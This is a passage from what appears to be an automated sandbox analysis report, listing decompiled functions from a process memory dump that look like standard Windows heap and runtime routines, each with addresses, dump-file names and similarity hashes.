                                                                                                                                			E04F0C577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E04F0C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x4ec11cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E04FB88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}









                                                                                                                                0x04f0c577
                                                                                                                                0x04f0c57d
                                                                                                                                0x04f0c581
                                                                                                                                0x04f0c5b5
                                                                                                                                0x04f0c5b9
                                                                                                                                0x04f0c5ce
                                                                                                                                0x04f0c5ce
                                                                                                                                0x04f0c5ca
                                                                                                                                0x00000000
                                                                                                                                0x04f0c5ca
                                                                                                                                0x04f0c5c4
                                                                                                                                0x04f0c5c8
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f0c5ad
                                                                                                                                0x00000000
                                                                                                                                0x04f0c5af

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 6157bdf63d244fc35e7c6182ab6d5de48ca47579ca77458722085aeeb52980b2
                                                                                                                                • Instruction ID: aa65d5fec0e597df80ae212b57e1cde558c6d44184dee453b76c8b351155c518
                                                                                                                                • Opcode Fuzzy Hash: 6157bdf63d244fc35e7c6182ab6d5de48ca47579ca77458722085aeeb52980b2
                                                                                                                                • Instruction Fuzzy Hash: 15F0F0BBD112D0CFE7398B188044B327BD89B85370F84C666D405831C1E2A4F882E240
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04FA2073, Relevance: .0, Instructions: 32COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 94%
                                                                                                                                			E04FA2073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E04F9FD22(__ecx);
				_t19 =  *0x4fd849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x4fd8748; // 0x0
					if(__eflags <= 0) {
						E04FA1C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x4fd8724 & 0x00000004;
							if(( *0x4fd8724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x4fd8724; // 0x0
					return E04F98DF1(__ebx, 0xc0000374, 0x4fd5890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}







                                                                                                                                0x04fa2076
                                                                                                                                0x04fa2078
                                                                                                                                0x04fa207d
                                                                                                                                0x04fa2083
                                                                                                                                0x04fa20a4
                                                                                                                                0x04fa20aa
                                                                                                                                0x04fa20ac
                                                                                                                                0x04fa20b7
                                                                                                                                0x04fa20ba
                                                                                                                                0x04fa20bc
                                                                                                                                0x04fa20c9
                                                                                                                                0x04fa20c9
                                                                                                                                0x04fa20d0
                                                                                                                                0x04fa20d2
                                                                                                                                0x00000000
                                                                                                                                0x04fa20d2
                                                                                                                                0x04fa20be
                                                                                                                                0x04fa20c3
                                                                                                                                0x04fa20c5
                                                                                                                                0x04fa20c7
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04fa20c7
                                                                                                                                0x04fa20bc
                                                                                                                                0x04fa20d4
                                                                                                                                0x04fa2085
                                                                                                                                0x04fa2085
                                                                                                                                0x04fa20a3
                                                                                                                                0x04fa20a3

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: acfcc5493d32a4287ff9e145ff9d603963faece5a8b3cc41cbefa819929c262b
                                                                                                                                • Instruction ID: 0541a5c7236ef12b2407598a42d462e66d14597ae7a3a14c0284f0ed37fb9a88
                                                                                                                                • Opcode Fuzzy Hash: acfcc5493d32a4287ff9e145ff9d603963faece5a8b3cc41cbefa819929c262b
                                                                                                                                • Instruction Fuzzy Hash: 87F0A7AAA261C84AFF327F3975017D13BD1D746294F0F54C6D46057300C938AC93CA20
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04FB8D34, Relevance: .0, Instructions: 32COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 43%
                                                                                                                                			E04FB8D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x4fdd360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E04F07D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E04F2B640(E04F29AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}













                                                                                                                                0x04fb8d34
                                                                                                                                0x04fb8d43
                                                                                                                                0x04fb8d4b
                                                                                                                                0x04fb8d4e
                                                                                                                                0x04fb8d52
                                                                                                                                0x04fb8d5c
                                                                                                                                0x04fb8d6e
                                                                                                                                0x04fb8d5e
                                                                                                                                0x04fb8d67
                                                                                                                                0x04fb8d67
                                                                                                                                0x04fb8d79
                                                                                                                                0x04fb8d7a
                                                                                                                                0x04fb8d7c
                                                                                                                                0x04fb8d81
                                                                                                                                0x04fb8d94

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 4f657c62c0d49a30d4782c5ca3f57b1e467fdcdf6c1c2d95a7e2f4e87a21b71b
                                                                                                                                • Instruction ID: 19090715894e654ab2a1ddae7aa391816e499e1fd14a52574e2b16cbd61608f5
                                                                                                                                • Opcode Fuzzy Hash: 4f657c62c0d49a30d4782c5ca3f57b1e467fdcdf6c1c2d95a7e2f4e87a21b71b
                                                                                                                                • Instruction Fuzzy Hash: 0AF0BB70E0460C9FD714EF75D941A6E77B4EF48300F108099E905DB280DA34F901C754
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F2927A, Relevance: .0, Instructions: 32COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 54%
                                                                                                                                			E04F2927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L04F04620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E04F2FA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E04F292C6(_t11, _t14);
				}
				return _t11;
			}





                                                                                                                                0x04f29295
                                                                                                                                0x04f29299
                                                                                                                                0x04f2929f
                                                                                                                                0x04f292aa
                                                                                                                                0x04f292ad
                                                                                                                                0x04f292ae
                                                                                                                                0x04f292af
                                                                                                                                0x04f292b0
                                                                                                                                0x04f292b4
                                                                                                                                0x04f292bb
                                                                                                                                0x04f292bb
                                                                                                                                0x04f292c5

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                                                                                                • Instruction ID: 2974c085fcf5f0e3ca961c5ac2a0f9ee23601534b10d0f47df92f40671aeea3d
                                                                                                                                • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                                                                                                • Instruction Fuzzy Hash: 37E02B723415002BE7119E05CD80F03776DDFC2B24F014078B5001F282C6E5EC0A87A0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04FB8CD6, Relevance: .0, Instructions: 31COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 36%
                                                                                                                                			E04FB8CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x4fdd360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E04F07D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E04F2B640(E04F29AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                                                                                                                0x04fb8ce5
                                                                                                                                0x04fb8ced
                                                                                                                                0x04fb8cf0
                                                                                                                                0x04fb8cfb
                                                                                                                                0x04fb8d0d
                                                                                                                                0x04fb8cfd
                                                                                                                                0x04fb8d06
                                                                                                                                0x04fb8d06
                                                                                                                                0x04fb8d18
                                                                                                                                0x04fb8d19
                                                                                                                                0x04fb8d1b
                                                                                                                                0x04fb8d20
                                                                                                                                0x04fb8d33

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 992751a0a9a2104417e529b7a17efa66fb991b567daa39d6b7254dca28f8ee9e
                                                                                                                                • Instruction ID: 572125eb147fe9c37d869f5b19b486249fb6209d2ee3e6f5f7cce0b5ca43d2e0
                                                                                                                                • Opcode Fuzzy Hash: 992751a0a9a2104417e529b7a17efa66fb991b567daa39d6b7254dca28f8ee9e
                                                                                                                                • Instruction Fuzzy Hash: C0F08270A05219ABDB04EBB9E946EAE77B8EF49304F10019AE955EB2C0EA34F901C754
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F0746D, Relevance: .0, Instructions: 31COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 88%
                                                                                                                                			E04F0746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E04EFEB70(__ecx, 0x4fd79a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E04F295D0();
							L04F077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}









                                                                                                                                0x04f0746d
                                                                                                                                0x04f0746d
                                                                                                                                0x04f0746d
                                                                                                                                0x04f07471
                                                                                                                                0x04f07488
                                                                                                                                0x04f4f92d
                                                                                                                                0x04f0748e
                                                                                                                                0x04f07491
                                                                                                                                0x04f07495
                                                                                                                                0x04f4f937
                                                                                                                                0x04f4f93a
                                                                                                                                0x04f4f94e
                                                                                                                                0x04f4f953
                                                                                                                                0x04f4f956
                                                                                                                                0x04f4f956
                                                                                                                                0x04f07495
                                                                                                                                0x00000000
                                                                                                                                0x04f07488
                                                                                                                                0x04f07473
                                                                                                                                0x04f07478
                                                                                                                                0x04f0747d
                                                                                                                                0x04f07481
                                                                                                                                0x00000000
                                                                                                                                0x04f07481
                                                                                                                                0x04f0747d
                                                                                                                                0x04f0747a
                                                                                                                                0x00000000

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 219038f09dfd6da527af75ae90fd7fb1f61242e11d38a1fa43424d8830739e57
                                                                                                                                • Instruction ID: 640edd009bee4ce078f16c2a11a95bca9e70194821cf94301dd0d153e594dd8d
                                                                                                                                • Opcode Fuzzy Hash: 219038f09dfd6da527af75ae90fd7fb1f61242e11d38a1fa43424d8830739e57
                                                                                                                                • Instruction Fuzzy Hash: BCF09039A00144EADB21BBA8C840B7ABFE1AF84254F448595D451AB1A0E764B803E695
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04FB8B58, Relevance: .0, Instructions: 31COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 36%
                                                                                                                                			E04FB8B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x4fdd360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E04F07D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E04F2B640(E04F29AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                                                                                                                0x04fb8b67
                                                                                                                                0x04fb8b6f
                                                                                                                                0x04fb8b72
                                                                                                                                0x04fb8b7d
                                                                                                                                0x04fb8b8f
                                                                                                                                0x04fb8b7f
                                                                                                                                0x04fb8b88
                                                                                                                                0x04fb8b88
                                                                                                                                0x04fb8b9a
                                                                                                                                0x04fb8b9b
                                                                                                                                0x04fb8b9d
                                                                                                                                0x04fb8ba2
                                                                                                                                0x04fb8bb5

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 4ddd6f47b8fe2ced8ee63af5ebf504dfb6ddea9204d6f0a0ede54652c579df01
                                                                                                                                • Instruction ID: 6ab9660e378795c5ff4985aabdbd5236aae75fa289d19aca087cc1885dc3ae93
                                                                                                                                • Opcode Fuzzy Hash: 4ddd6f47b8fe2ced8ee63af5ebf504dfb6ddea9204d6f0a0ede54652c579df01
                                                                                                                                • Instruction Fuzzy Hash: 10F082B0A05258ABEB14FBB9DA06E6E77B8EF44304F044499BD05DB3C0EA74F901C794
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04EE4F2E, Relevance: .0, Instructions: 31COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 100%
                                                                                                                                			E04EE4F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E04FB88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E04F0C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x4ec1030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}









                                                                                                                                0x04ee4f2e
                                                                                                                                0x04ee4f34
                                                                                                                                0x04ee4f38
                                                                                                                                0x04f40b85
                                                                                                                                0x04f40b85
                                                                                                                                0x04f40b89
                                                                                                                                0x04f40b9a
                                                                                                                                0x04f40b9a
                                                                                                                                0x04f40b9f
                                                                                                                                0x00000000
                                                                                                                                0x04f40b9f
                                                                                                                                0x04f40b94
                                                                                                                                0x04f40b98
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f40b98
                                                                                                                                0x04ee4f3e
                                                                                                                                0x04ee4f48
                                                                                                                                0x00000000
                                                                                                                                0x04ee4f6e
                                                                                                                                0x00000000
                                                                                                                                0x04ee4f70

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 41a1a668e197e5c3df6d02ecb24b6399d025bad50b77ff06e77301e539d89299
                                                                                                                                • Instruction ID: 9260f7f7b7a682d1defd50da67931c3637ee31bb7d17e4cf8a241e5d2325bbb0
                                                                                                                                • Opcode Fuzzy Hash: 41a1a668e197e5c3df6d02ecb24b6399d025bad50b77ff06e77301e539d89299
                                                                                                                                • Instruction Fuzzy Hash: EBF0E232D216948FE771EB18C544F22BBD8AB807B8F449464D505C7A21CF24FC42C688
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F1A44B, Relevance: .0, Instructions: 29COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 100%
                                                                                                                                			E04F1A44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x4fd7b9c; // 0x0
				_t15 = __ecx;
				_t16 = L04F04620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E04F2FA60(_t17, 0, _t15 << 2);
				return _t17;
			}







                                                                                                                                0x04f1a44b
                                                                                                                                0x04f1a453
                                                                                                                                0x04f1a472
                                                                                                                                0x04f1a476
                                                                                                                                0x00000000
                                                                                                                                0x04f1a493
                                                                                                                                0x04f1a47a
                                                                                                                                0x04f1a47f
                                                                                                                                0x04f1a486
                                                                                                                                0x00000000

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 6d7881b7c3207c844c4fb6292fbcd04603bbb604e74d1538b188905155bd8058
                                                                                                                                • Instruction ID: 232bbf900effc8c99ffabda0c77bf0e01d8773826953c9da9f459817fbccc61b
                                                                                                                                • Opcode Fuzzy Hash: 6d7881b7c3207c844c4fb6292fbcd04603bbb604e74d1538b188905155bd8058
                                                                                                                                • Instruction Fuzzy Hash: 29E09272E02421ABD2115A18BC00F67B3ADDBD4A55F094035E504C7264D628ED02D7E0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04EEF358, Relevance: .0, Instructions: 28COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 79%
                                                                                                                                			E04EEF358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E04F1F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L04F04620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}






                                                                                                                                0x04eef35d
                                                                                                                                0x04eef361
                                                                                                                                0x04eef367
                                                                                                                                0x04eef372
                                                                                                                                0x04eef38c
                                                                                                                                0x04eef38c
                                                                                                                                0x04eef394

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                                                                                                • Instruction ID: 88393816b44f23ea2c26924b3bea757bdd77fb7eca8d2be776e236bdf0f82086
                                                                                                                                • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                                                                                                • Instruction Fuzzy Hash: E1E0D832A40118BBDB3196D9DE05F7AFBACDB84B60F004196B904D7190D560AD00D6D0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04EFFF60, Relevance: .0, Instructions: 22COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 100%
                                                                                                                                			E04EFFF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x4ec11a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E04FB88F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E04F00050(_t14);
				}
			}










                                                                                                                                0x04efff66
                                                                                                                                0x04efff6b
                                                                                                                                0x00000000
                                                                                                                                0x04efff8f
                                                                                                                                0x00000000
                                                                                                                                0x04efff8f

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 22726e303ac1e828c9d37e53a2fc88e0d17d3fa783a3967cb53ad0e888a7e179
                                                                                                                                • Instruction ID: 17b62d3262f854bdefccfdb89b5abf05de49f2b0ae5e63cf8bdc047916e378dc
                                                                                                                                • Opcode Fuzzy Hash: 22726e303ac1e828c9d37e53a2fc88e0d17d3fa783a3967cb53ad0e888a7e179
                                                                                                                                • Instruction Fuzzy Hash: 8DE026B2205204DFEB34DF52DD80F26779E9F8272DF19A41FE1084B102E621F882C646
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F741E8, Relevance: .0, Instructions: 21COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 82%
                                                                                                                                			E04F741E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x4fc08f0);
				_t5 = E04F3D08C(__ebx, __edi, __esi);
				if( *0x4fd87ec == 0) {
					E04EFEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x4fd87ec == 0) {
						 *0x4fd87f0 = 0x4fd87ec;
						 *0x4fd87ec = 0x4fd87ec;
						 *0x4fd87e8 = 0x4fd87e4;
						 *0x4fd87e4 = 0x4fd87e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L04F74248();
				}
				return E04F3D0D1(_t5);
			}





                                                                                                                                0x04f741e8
                                                                                                                                0x04f741ea
                                                                                                                                0x04f741ef
                                                                                                                                0x04f741fb
                                                                                                                                0x04f74206
                                                                                                                                0x04f7420b
                                                                                                                                0x04f74216
                                                                                                                                0x04f7421d
                                                                                                                                0x04f74222
                                                                                                                                0x04f7422c
                                                                                                                                0x04f74231
                                                                                                                                0x04f74231
                                                                                                                                0x04f74236
                                                                                                                                0x04f7423d
                                                                                                                                0x04f7423d
                                                                                                                                0x04f74247

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 4a2f9c5588f88dfa69787de91fd995cff3a036ea24d14ab62cf7b58538dde375
                                                                                                                                • Instruction ID: 77d7f672e5856a3773c3c76a5e24b15d558a0d65e77f2455472f226a4b3456c6
                                                                                                                                • Opcode Fuzzy Hash: 4a2f9c5588f88dfa69787de91fd995cff3a036ea24d14ab62cf7b58538dde375
                                                                                                                                • Instruction Fuzzy Hash: 2FF0397496270AEFEBA2FFBAF90070436B6F744799F00415AD22087284C73DA886CF01
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F9D380, Relevance: .0, Instructions: 21COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 100%
                                                                                                                                			E04F9D380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L04EEE8B0(__ecx, _a4, 0xfff);
					L04F077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
